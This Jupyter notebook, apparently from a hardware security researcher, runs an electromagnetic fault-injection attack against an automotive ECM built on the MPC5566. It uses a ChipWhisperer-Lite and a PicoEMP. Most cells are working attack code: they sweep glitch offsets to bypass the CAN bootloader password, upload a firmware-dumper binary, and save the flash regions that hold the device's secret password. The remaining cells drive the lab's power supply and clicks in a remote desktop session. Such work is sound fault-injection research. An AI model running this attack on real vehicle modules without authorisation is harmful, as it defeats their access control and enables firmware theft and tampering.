# CAN ECM Access Tool using ChipWhisperer-Lite
The following code is used to inject a fault in an ECM using a MPC5566 processor to facilitate extraction of the firmware which includes a secret password used to access the device.

# Initialize ChipWhisperer Lite

In [ ]:
PLATFORM='NOTHING'
import chipwhisperer as cw
scope = cw.scope()
%run <enter full path to>/jupyter/Setup_Scripts/Setup_Generic.ipynb

In [ ]:
# ** OPTIONAL ** Update Firmware
scope.upgrade_firmware()

In [ ]:
# Configure ChipWhisperer

scope.adc.basic_mode = "falling_edge"

scope.clock.clkgen_src = 'system'
scope.clock.clkgen_freq = 120e6
scope.clock.clkgen_mul = 2
scope.clock.clkgen_div = 1
scope.clock.extclk_freq = 12e6
scope.clock.adc_src = 'clkgen_x1'

scope.glitch.clk_src = 'clkgen'  # Use multiplied clock speed (not synchronized to clock)
scope.glitch.offset = 10
scope.glitch.output = 'enable_only'  #PicoEMP
scope.glitch.repeat = 10  # Make the pulse to the PicoEMP long enough
scope.glitch.trigger_src = "ext_single"
scope.glitch.width = 40
scope.glitch.width_fine = 1

scope.io.hs2 = "glitch"  # Glitch control line, connect to PicoEMP input
scope.io.tio1 = True  # Arduino One-Shot CAN Password Message
scope.io.tio2 = True  # Arduino One-Shot CAN Address/Size Message
scope.io.tio3 = True  # Relay controlling power to DUT
scope.io.tio4 = True  # Trigger input from CAN Bus converter
scope.io.nrst = True  # Reset line to ECM
scope.io.glitch_lp = True  # In case we want to Voltage Glitch
scope.io.glitch_hp = True

scope.trigger.triggers = "tio4"  # Chipwhisperer trigger input from CAN bus

---

# PicoEMP Voltage Interpolation
Run this to convert voltage to PicoEMP PWM values

In [ ]:
# Interpolation code for PicoEMP
# https://www.zovirl.com/2008/11/04/interpolated-lookup-tables-in-python/

class InterpolatedArray(object):

  """An array-like object that provides
  interpolated values between set points."""

  def __init__(self, points):
    self.points = sorted(points)

  def __getitem__(self, x):
    if x < self.points[0][0] or x > self.points[-1][0]:
      raise ValueError
    lower_point, upper_point = self._GetBoundingPoints(x)
    return self._Interpolate(x, lower_point, upper_point)

  def _GetBoundingPoints(self, x):
    """Get the lower/upper points that bound x."""
    lower_point = None
    upper_point = self.points[0]
    for point  in self.points[1:]:
      lower_point = upper_point
      upper_point = point
      if x <= upper_point[0]:
        break
    return lower_point, upper_point

  def _Interpolate(self, x, lower_point, upper_point):
    """Interpolate a Y value for x given lower & upper
    bounding points."""
    slope = (float(upper_point[1] - lower_point[1]) /
             (upper_point[0] - lower_point[0]))
    return lower_point[1] + (slope * (x - lower_point[0]))

In [ ]:
# PicoEMP Driver Module
import serial
import time

# Hash's measured values for power config below
#
# Measure your own PicoEMP by sending commands to set voltage to values in the table. 
# Note the resulting voltage and update the voltage accordingly.
# ex. Set your PicoEMP to 50V, read the voltage it's actually at using a voltmeter.
#     Then update the table value from 50 to 55 or whatever it is actually. 
#
# Alternatively, just send the PWM commands and build your own table to pass to interpolator.
#
# 50V = 0.05, 81V = 0.045, 113V = 0.040, 149V = 0.035, 186V = 0.030, 221V = 0.025
# 247V = 0.020, 250.7V = 0.019, 253.3V = 0.018, 254.9V = 0.017, 255.6V = 0.016
# 254.9V = 0.015, 252.6V = 0.014, 245V = 0.0122

class picoemp():
    def __init__(self, serial_port):
        self.ser = serial.Serial(
            port=serial_port,
            baudrate=115200
        )
        self.voltage_data = ((50, 0.05),   (81, 0.045),   (113, 0.040), 
                             (149,0.035),  (186, 0.030),  (221, 0.025), 
                             (247, 0.020), (250.7,0.019), (253.3, 0.018), 
                             (255.6, 0.016)
                            )
        self.pulse_power = InterpolatedArray(self.voltage_data)
        self.ser.isOpen()
        self.ser.write('di'.encode())  #Disable Disarming Timeout
        self.ser.write('\r'.encode())
        time.sleep(0.01)

    def arm(self):
        self.ser.write('a'.encode())
        self.ser.write('\r'.encode())
        time.sleep(5)  #Wait for capacitor to charge
        
    def disarm(self):
        self.ser.write('d'.encode())
        self.ser.write('\r'.encode())
        time.sleep(0.01)

    def pulse_parameters(self, pulse_delay, pulse_duration):
        self.ser.write('fa'.encode())
        #self.ser.write('a'.encode())
        self.ser.write('\r'.encode())
        self.ser.write(str(pulse_delay).encode())
        self.ser.write('\r'.encode())
        self.ser.write(str(pulse_duration).encode())
        self.ser.write('\r'.encode())        
        time.sleep(0.01)

    def pulse_voltage(self, pulse_voltage):
        self.ser.write('c'.encode())
        self.ser.write('\r'.encode())
        self.ser.write('5'.encode())  #Pulse time set to 5, this isn't used so left default
        self.ser.write('\r'.encode())
        self.ser.write(str(self.pulse_power[pulse_voltage]).encode())
        self.ser.write('\r'.encode())
        time.sleep(0.01)

    def set_trigger(self):
        self.ser.write('f'.encode())
        self.ser.write('\r'.encode())
        time.sleep(0.01)
        
    def close(self):
        self.disarm()
        self.ser.close()
        time.sleep(0.01)

emp = picoemp('/dev/ttyACM0')  # Change to match the port your PicoEMP is on

emp.pulse_voltage(255)
emp.pulse_parameters(0, 625)

In [ ]:
# DISARM PicoEMP
scope.io.hs2 = 'clkgen'  # This sends a bunch of triggers to the digital input in case PicoEMP is waiting for a trigger
scope.io.hs2 = 'glitch'
print("Disarm EMP")
emp.disarm()

---

# Generate notification sound

In [ ]:
# You can thank Colin for the idea to use this sound...
#
from IPython.display import Audio, display

def finished():
    display(Audio(url='https://sound.peal.io/ps/audios/000/000/537/original/woo_vu_luvub_dub_dub.wav', autoplay=True))
    

---

# CAN EMP Glitch Program

In [ ]:
# ** WORKING EMP Glitch ** FIRMWARE DUMPER - Load Firmware Dumper and capture dumped memory

import can
import time
import sys
import hexrec as hr

# Make sure this value which is used in the addrSize_msg matches in the one-shot
# Arduino CAN trigger.
size = 0xD000  
loader_bytes = [0] * size
public_password_msg = can.Message(
    arbitration_id=0x011, 
    data=[0xFE,0xED,0xFA,0xCE,0xCA,0xFE,0xBE,0xEF], 
    is_extended_id=False
)
addrSize_msg = can.Message(
    arbitration_id=0x012, 
    data=[0x40, 0x00, 0x00, 0x00, 0x00, (size >> 16) & 0xFF, (size >> 8) & 0xFF, size & 0x00], 
    is_extended_id=False
)
# Empty CAN message set as data type
data_msg = can.Message(
    arbitration_id=0x013, 
    data=[0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], 
    is_extended_id=False
)

# Load file to send to processor
# FLexCAN-Dumper_FINAL extracts the BAM, Shadow and Main flash from the MPC5566
# and sends back over the CAN bus as messages 0x100, 0x200, 0x300. It signifies
# the end of the data by incrementing the ID by one. 0x100 --> 0x101 etc.
in_file = hr.load('FLexCAN-Dumper_FINAL.bin')
data = in_file.read()

# Set all bytes to 0 if not loaded via binary, this is necessary to initialize ECC
# protected memory. If the entire memory space accessed is not initialized the 
# program will not run.
for i in range(0, len(data)):
    loader_bytes[i] = data[i]

bus = can.Bus(interface='socketcan', channel='can0')

emp_voltage = 255
emp.pulse_voltage(255)
scope.io.hs2 = 'clkgen'
scope.io.hs2 = 'glitch'
scope.io.tio3 = True  # Relay controlling board power

print("Disarm EMP")
emp.disarm()
time.sleep(5)

while(True):
    scope.glitch.repeat = 10  # Sets the pulse width used to trigger PicoEMP, not critical value
    for emp_pulse_width in range(17, 18):
        print("\nPulse Width:", emp_pulse_width)
        emp.pulse_parameters(0, emp_pulse_width)
        print("Charging EMP Pulse:" , emp_voltage, "V")
        emp.arm()
        # EMP voltages to try in each iteration
        for emp_voltage in range(60, 61, 1):
            emp.pulse_voltage(emp_voltage) 
            print("\nPulse Voltage:", emp_voltage, "V")
            # Glitch offsets to try during each loop iteration
            for glitch_offset in range(62000, 63000, 1):
                # Test to make sure board didn't crash
                scope.clock.freq_ctr_src = 'extclk'  # This must be done each time for clock.freq_ctr to update
                if(scope.clock.freq_ctr == 0):
                    print("Crashed at GO:", glitch_offset)
                    # Power cycle board using relay controlled by tio3
                    scope.io.tio3 = False   
                    time.sleep(1)
                    scope.io.tio3 = True
                    time.sleep(0.2)
                scope.glitch.ext_offset = glitch_offset
                # PicoEMP configured to wait for transition on digital input which will come from chipwhisperer
                emp.set_trigger()
            
                scope.io.nrst = False  # Reboot DUT
                time.sleep(0.05)
                scope.io.nrst = True
                time.sleep(float(emp_pulse_width / 100))  # Sleep longer for longer pulses so PicoEMP can charge

                scope.arm()
                # Arduino send one-shot password
                scope.io.tio1 = False
                time.sleep(0.001)
                scope.io.tio1 = True
                # End one-shot password
                data = bus.recv(0.1)  # Sinkhole Arduino one-shot transmit
                data = bus.recv(0.1)  # Capture 001 response if we get it
                if(data and data.arbitration_id == 0x001):
                    bus.send(addrSize_msg, 0.1)
                    print("1. Got 001 message, bus.send 002")
                else:
                    # Arduino send one-shot address
                    time.sleep(0.02)
                    scope.io.tio2 = False
                    time.sleep(0.001)
                    scope.io.tio2 = True
                    # End one-shot address
                    data = bus.recv(0.1)  # Sinkhole Arduino one-shot transmit
                data = bus.recv(0.1)  # Test to see if we got 002 response
                counter = 0
                while(data and (counter < 25)):
                    #if (counter > 0):
                    print("While Loop. GO:", glitch_offset)
                    print("Got:", data)
                    if(data and data.arbitration_id == 0x001):
                        print("Got 001 in while loop")
                        break
                    if(data and data.arbitration_id == 0x002):
                        print("Got 002 in while loop")
                        break
                    counter = counter + 1
                    data = bus.recv(1)
                if(data):
                    if (data.arbitration_id == 0x001):
                        print("2. Got 001 message, bus.send 012")
                        # Send 002
                        bus.send(addrSize_msg, 1)
                        data = bus.recv(1)
                        print("2. Received from bus send 012:", data)
                        data = bus.recv(1)
                    if(data):
                        if(data.arbitration_id == 0x002):
                            print("3. Got 002 message, bus.send 013")
                            print("This worked!")
                            data = bus.recv(0.1)
                            # Clear any data in the receive buffer
                            print("Clear Receive Buffer")
                            while(data):
                                data = bus.recv(0.1)
                                print("CB:", data)
                            # Send data to target
                            print("Send Boot Loader")
                            for i in range(0, len(loader_bytes)):
                                data_msg.data[i%8] = loader_bytes[i]
                                if (i % 8 == 7):
                                    bus.send(data_msg, 0.1)
                                    print("Sent:", data_msg.data)
                                    time.sleep(0.001)
                                    received = bus.recv(1)
                                    if(received):
                                        print("Received:", received.data)
                                    # if received.data != data_msg.data:
                                    #     print("Data Mismatch")
                                    #     print("Received:", received)
                                    #     print("Sent:", data_msg)
                            print("Sent Boot Loader...")
                            # Capture CAN traffic sent back
                            capture_data(0)  # See Dumped Firmware Capture Code, 0 or 1 sets CAN device used
                            input("Wait for keypress")  # Wait here to see if firmware dumper was successful
        
print("\nFinished")
bus.shutdown()
emp.disarm()
bus.shutdown()

---

# CAN Loader for board with known CAN Password

In [ ]:
# ** WORKING ** Used with Dev board with known CAN password to test MPC5566 CodeWarrior programs

import can
import time
import sys
import hexrec as hr

# Set max data size - Revisit this if program gets bigger
size = 0xD000
loader_bytes = [0] * size

public_password_msg = can.Message(
    arbitration_id=0x011, 
    data=[0xFE,0xED,0xFA,0xCE,0xCA,0xFE,0xBE,0xEF], 
    is_extended_id=False
)
# Change to match the password for your board
actual_password_msg = can.Message(
    arbitration_id=0x011, 
    data=[0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08], 
    is_extended_id=False
)
addrSize_msg = can.Message(
    arbitration_id=0x012, 
    data=[0x40, 0x00, 0x00, 0x00, 0x00, (size >> 16) & 0xFF, (size >> 8) & 0xFF, size & 0x00], 
    is_extended_id=False
)
# Empty CAN message set as data type
data_msg = can.Message(
    arbitration_id=0x013, 
    data=[0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], 
    is_extended_id=False
)
power_supply.trigger_toggle()
time.sleep(1)
# Load file to send to processor
in_file = hr.load('FLexCAN-AllTestv1.bin')
data = in_file.read()

# Set all bytes to 0 if not loaded via binary
for i in range(0, len(data)):
    loader_bytes[i] = data[i]


bus1 = can.Bus(interface='socketcan', channel='can1')

bus1.send(actual_password_msg, 0.1)  # Sends CAN message
data = bus1.recv(0.1)
if(data):
    if (data.arbitration_id == 0x001):
        print("This worked!")
        bus1.send(addrSize_msg, 0.1)
        data = bus1.recv(1)
        if(data):
            print("Got:", data)
            
        # Sending data to target
        print("Start Loop")
        for i in range(0, len(loader_bytes)):
            data_msg.data[i%8] = loader_bytes[i]
            if (i % 8 == 7):
                bus1.send(data_msg, 0.1)
                received = bus1.recv(1)
                if received.data != data_msg.data:
                    print("Data Mismatch")
                    print("Received:", received)
                    print("Sent:", data_msg)
                else:
                    print("Sent Data:", data_msg.data)
        capture_data(1)
        finished()
        
print("\nFinished")
bus.shutdown()

---

# Dumped Firmware Capture Code

In [ ]:
# ** WORKING ** Run this prior to running CAN Dumper to load subroutines

def get_data(port):
    if(port == 0):
        return bus.recv(1)
    if(port == 1):
        return bus1.recv(1)
    
def capture_data(port):
    data = get_data(port)
    if (data and data.arbitration_id == 0x100):
        with open('<set your path here>/Flash_BAM.bin', 'wb') as f:
            while(data.arbitration_id != 0x101):
                # Write binary data to the file
                f.write(data.data)
                data = get_data(port)

    data = get_data(port)
    if (data and data.arbitration_id == 0x200):
        with open('<set your path here>/Flash_Shadow.bin', 'wb') as f:
            while(data.arbitration_id != 0x201):
                # Write binary data to the file
                f.write(data.data)
                data = get_data(port)

    data = get_data(port)
    if (data and data.arbitration_id == 0x300):
        with open('<set your path here>/Flash_Main.bin', 'wb') as f:
            while(data.arbitration_id != 0x301):
                # Write binary data to the file
                f.write(data.data)
                data = get_data(port)
            

---

# Mouse Control for Remmina

In [ ]:
# ** WORKING ** Used to control mouse for interacting with other programs
#               Was used to click on JTAG connect in Windows RDP session
import pyautogui
# Use these to determine screen size and mouse position
print(pyautogui.size())
print(pyautogui.position())
# Use to perform the click
pyautogui.click(838,1822)  

---

# Envox BB3 Control Code

In [ ]:
# ENVOX Library - LOAD THIS before use
# -*- encoding:utf-8 -*-
import telnetlib
import time
import logging
logger = logging.getLogger(__name__)


class EnvoxBB3:
    def __init__(self):
        self.refresh = True  # Flag to enable polling loop
        self.polling = None  # Flag to show whether the power supply is being read or not
        # self.queue = message_queue
        self.connected = False
        self.ipaddress = None
        self.port = None
        self.tn = None

    def connect(self, ipaddress: str, port: str) -> (bool, str):
        try:
            self.ipaddress = ipaddress
            self.port = int(port)
            self.tn = telnetlib.Telnet(self.ipaddress, self.port, timeout=2)
        except Exception:
            raise

        self.tn.write(b"\n")
        self.tn.read_very_eager()  # Get rid of any issues before we start
        self.connected = True
        return True

    def disconnect(self):
        self.connected = False
        while self.polling:
            time.sleep(0.1)
        self.tn.close()

    def get_settings(self, settings: dict):
        # Load current values from power supply
        self.refresh = False
        while self.polling:  # Wait until refresh cycle completes
            pass
        self.tn.write(b"INST CH1\n")
        self.tn.write(str.encode('VOLT?\n'))
        settings['powersupply_ch1_volt_set'] = \
            float(self.tn.read_until(match=b'\n').replace(b'\r\n', b'').decode("utf-8"))
        self.tn.write(str.encode('CURR?\n'))
        settings['powersupply_ch1_curr_set'] = \
            float(self.tn.read_until(match=b'\n').replace(b'\r\n', b'').decode("utf-8"))
        self.tn.write(str.encode('OUTP?\n'))
        if (self.tn.read_until(match=b'\n').replace(b'\r\n', b'')) == b'1':
            settings['powersupply_ch1_enable'] = True
        else:
            settings['powersupply_ch1_enable'] = False
        self.tn.write(b"INST CH2\n")
        self.tn.write(str.encode('VOLT?\n'))
        settings['powersupply_ch2_volt_set'] = \
            float(self.tn.read_until(match=b'\n').replace(b'\r\n', b'').decode("utf-8"))
        self.tn.write(str.encode('CURR?\n'))
        settings['powersupply_ch2_curr_set'] = \
            float(self.tn.read_until(match=b'\n').replace(b'\r\n', b'').decode("utf-8"))
        self.tn.write(str.encode('OUTP?\n'))
        if (self.tn.read_until(match=b'\n').replace(b'\r\n', b'')) == b'1':
            settings['powersupply_ch2_enable'] = True
        else:
            settings['powersupply_ch2_enable'] = False
        self.refresh = True

    def set_settings(self, settings: dict):
        """ Command used to set power supply values

            Voltage and current are set, outputs are enabled/disabled.
        """

        self.refresh = False
        while self.polling:  # Wait until refresh cycle completes
            pass
        # Setup channel 1
        self.tn.write(b'INST CH1\n')
        if settings['powersupply_ch1_volt_set'] != '':
            self.tn.write(str.encode('VOLT {}\n'.format(settings['powersupply_ch1_volt_set'])))
        if settings['powersupply_ch1_curr_set'] != '':
            self.tn.write(str.encode('CURR {}\n'.format(settings['powersupply_ch1_curr_set'])))
        if settings['powersupply_ch1_enable'] is True:
            self.tn.write(b'OUTP 1\n')
        elif settings['powersupply_ch1_enable'] is False:
            self.tn.write(b'OUTP 0\n')

        # Setup channel 2
        self.tn.write(b'INST CH2\n')
        if settings['powersupply_ch2_volt_set'] != '':
            self.tn.write(str.encode('VOLT {}\n'.format(settings['powersupply_ch2_volt_set'])))
        if settings['powersupply_ch2_curr_set'] != '':
            self.tn.write(str.encode('CURR {}\n'.format(settings['powersupply_ch2_curr_set'])))
        if settings['powersupply_ch2_enable'] is True:
            self.tn.write(b'OUTP 1\n')
        elif settings['powersupply_ch2_enable'] is False:
            self.tn.write(b'OUTP 0\n')

        self.refresh = True

    def get_measurement(self, measurements: dict):
        self.polling = True
        self.tn.write(b"INST CH1\n")
        self.tn.write(str.encode('MEAS:VOLT?\n'))
        measurements['powersupply_ch1_volt_meas'] = \
            float(self.tn.read_until(match=b'\n', timeout=0.5).replace(b'\r\n', b''))
        self.tn.write(str.encode('MEAS:CURR?\n'))
        measurements['powersupply_ch1_curr_meas'] = \
            float(self.tn.read_until(match=b'\n', timeout=0.5).replace(b'\r\n', b''))
        self.tn.write(b"INST CH2\n")
        self.tn.write(str.encode('MEAS:VOLT?\n'))
        measurements['powersupply_ch2_volt_meas'] = \
            float(self.tn.read_until(match=b'\n', timeout=0.5).replace(b'\r\n', b''))
        self.tn.write(str.encode('MEAS:CURR?\n'))
        measurements['powersupply_ch2_curr_meas'] = \
            float(self.tn.read_until(match=b'\n', timeout=0.5).replace(b'\r\n', b''))
        self.polling = False

    def config_toggle_time(self, channel: int, voltage: float, current: float, toggle_time: float):
        """ Take the current voltage and current settings for a given channel and load into power supply toggle list"""
        logger.info(f"Envox BB3 config toggle time, channel = {channel}, toggle time = {toggle_time}")

        self.refresh = False
        while self.polling:  # Wait until refresh cycle completes
            pass

        if channel == 1:
            self.tn.write(b'INST CH1\n')
        elif channel == 2:
            self.tn.write(b'INST CH2\n')
        else:
            return

        self.tn.write(str.encode(f"VOLT:MODE LIST\nLIST:VOLT 0, {voltage}\nCURR:MODE LIST\nLIST:CURR {current}\n"
                                 f"LIST:DWEL {toggle_time}\nLIST:COUN 1\nTRIG:SOUR IMM\nTRIG:EXIT:COND LAST\n"))
        self.refresh = True

    def trigger_toggle(self):
        self.refresh = False
        while self.polling:  # Wait until refresh cycle completes
            pass
        self.tn.write(b'INIT\n')
        self.refresh = True

    def set_toggle(self, channel: str):
        """ Set which channel should toggle when a trigger is sent """
        self.refresh = False
        while self.polling:  # Wait until refresh cycle completes
            pass
        if channel == "1":
                # Enable toggle on channel 1
                self.tn.write(b'INST CH1\n')
                self.tn.write(b'VOLT:MODE LIST\nCURR:MODE LIST\n')
                # Disable toggle on channel 2
                self.tn.write(b'INST CH2\n')
                self.tn.write(b'VOLT:MODE FIX\nCURR:MODE FIX\n')
        elif channel == "2":
                # Enable toggle on channel 2
                self.tn.write(b'INST CH2\n')
                self.tn.write(b'VOLT:MODE LIST\nCURR:MODE LIST\n')
                # Disable toggle on channel 1
                self.tn.write(b'INST CH1\n')
                self.tn.write(b'VOLT:MODE FIX\nCURR:MODE FIX\n')
        elif channel == "ALL":
                # Enable toggle on channel 1
                self.tn.write(b'INST CH1\n')
                self.tn.write(b'VOLT:MODE LIST\nCURR:MODE LIST\n')
                # Enable toggle on channel 2
                self.tn.write(b'INST CH2\n')
                self.tn.write(b'VOLT:MODE LIST\nCURR:MODE LIST\n')
        self.refresh = True

In [ ]:
# ** WORKING ** Used with Dev board to control power

import sys
print(sys.version)

power_supply = EnvoxBB3()
power_supply.connect('10.0.0.50', '5025')
power_supply.config_toggle_time(2,12.0,2.0,0.5) # Configure (Output Number, Voltage, Current, Toggle Time)
power_supply.set_toggle('2')  # Configure which output to toggle

In [ ]:
power_supply.trigger_toggle()  # Sending this command only will toggle the output

---